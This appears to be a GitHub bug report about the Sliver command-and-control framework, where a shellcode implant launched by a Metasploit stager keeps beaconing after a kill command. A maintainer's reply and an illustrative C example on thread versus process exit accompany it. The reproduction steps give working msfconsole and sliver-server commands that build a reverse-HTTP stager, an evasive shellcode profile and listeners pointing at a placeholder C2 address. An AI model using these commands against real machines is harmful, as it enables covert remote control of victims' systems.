Use kill --force if you want to kill the host process. When running from a shellcode or a shared library, we call ExitThread instead of ExitProcess to avoid inadvertently killing the host process (in case the user injected in an already running process). This is by design.
There might be some incompatibilities between Donut and MSF stagers regarding calls to ExitThread which may cause the behavior you observed (implant still reaching out after a regular kill). I still need to figure that part out.
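The thread-exit versus process-exit distinction described in the reply above, shown with POSIX analogues as an added example (not part of the issue thread or Sliver's code): `pthread_exit` stands in for `ExitThread` and `_exit` for `ExitProcess`. The function names and exit codes are constructed for illustration.

```c
#include <pthread.h>
#include <stdio.h>
#include <sys/wait.h>
#include <unistd.h>

/* Stand-in for a payload thread that has just received "kill". */
static void *payload_thread(void *arg) {
    int force = *(int *)arg;
    if (force)
        _exit(7);           /* ExitProcess analogue: the whole host process ends */
    pthread_exit(NULL);     /* ExitThread analogue: only this thread ends */
}

/* Runs a constructed "host" in a child process and returns its exit code.
 * 0 means the host outlived the payload thread and finished on its own;
 * 7 means the payload thread took the host process down with it. */
int host_exit_code(int force) {
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        pthread_t t;
        if (pthread_create(&t, NULL, payload_thread, &force) != 0)
            _exit(99);
        pthread_join(t, NULL);
        /* Only reached when the payload ended its thread, not the process. */
        _exit(0);
    }
    int status;
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void) {
    printf("thread exit  -> host exit code %d\n", host_exit_code(0));
    printf("process exit -> host exit code %d\n", host_exit_code(1));
    return 0;
}
```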
Describe the bug
Sending the kill command doesn't terminate the implant.
Looking at the target machine, the process keeps running and it sends periodic pings to the C2 server. The sliver-server logs show connection attempts from an unregistered implant. The implant was generated as shellcode and a Metasploit stager was used to execute the payload.
To Reproduce
> msfconsole
use payload/windows/x64/custom/reverse_winhttp
set LHOST [SLIVER_SERVER_IP]
set LPORT 8443
set LURI home.woff
generate -f exe -o /tmp/index.exe
exit
Move index.exe to the target machine (i.e. Windows Server 2022)
sliver-server
profiles new --mtls [SLIVER_SERVER_IP]:8080 --format shellcode --evasion mtls-windows-shellcode
stage-listener --url http://[SLIVER_SERVER_IP]:8443 --profile mtls-windows-shellcode --prepend-size
mtls -l 8080
use [SESSION_ID]
kill
Expected behavior
The implant should terminate when the C2 server sends the kill command
Screenshots
![Screenshot](https://private-user-images.githubusercontent.com/45320229/244170719-c1904374-142e-4d7b-8e99-8291f4bfff8a.png)
Desktop (please complete the following information):
1.5.39
Additional context
none